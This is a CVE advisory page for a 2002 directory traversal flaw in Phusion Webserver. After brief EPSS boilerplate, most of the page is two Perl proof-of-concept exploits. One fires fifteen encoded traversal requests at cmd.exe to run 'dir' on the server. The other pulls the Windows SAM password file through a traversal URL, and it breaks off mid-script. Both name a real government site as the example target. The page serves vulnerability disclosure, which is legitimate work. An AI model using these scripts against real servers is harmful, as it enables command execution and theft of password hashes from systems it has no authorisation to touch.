CVE-2002-0288 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. #!/usr/bin/perl # # Simple script to identify if the host is vulnerable!, # # This does 15 different checks based IIS 4-5. Have Fun! # # Phusion Webserver v1.0 proof-of-concept exploit # By Alex Hernandez <[email protected]> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_exp.pl <Hosts>:<Port> # # Example: # # perl -x Phusion_exp.pl www.whitehouse.com:80 # Trying..................... # # <THIS HOST IS VULNERABLE> :-) # Check the previous notes to execute bugs. # # use Socket; if ($#ARGV<0) {die " \nPhusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not using a proxy]\n Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying.....................\n"; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 14 my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 15 my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} #------------------------------ if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";} else {print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } }

source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. #!/usr/bin/perl # # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN # # Simple script to get files on server. # # Maybe u need this line for windows: # #! c:\perl\bin\perl.exe # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez <[email protected]> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion-GET.pl <And read the Intructions> # # print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); print <<"EOT"; Please type the address remote webserver, example: www.whitehouse.gov [Default remote Webserver is "127.0.0.1"`]: EOT $host = <>; print <<"EOT"; Please type only in the directory where the file is located you want to download, example: /winnt/repair/ [default directory is "/winnt/repair/"] :#For IIS 4-5 EOT $directory = <> || "/winnt/repair/"; print <<"EOT"; Please type in the filename you want download example: sam._ [default file is "sam._"] : EOT $file = <> || "sam._"; { #Maybe u to change this line depending of PATH installation. system("explorer.exe", "http://$host:80/../../..$directory$file"); } print <<"EOT";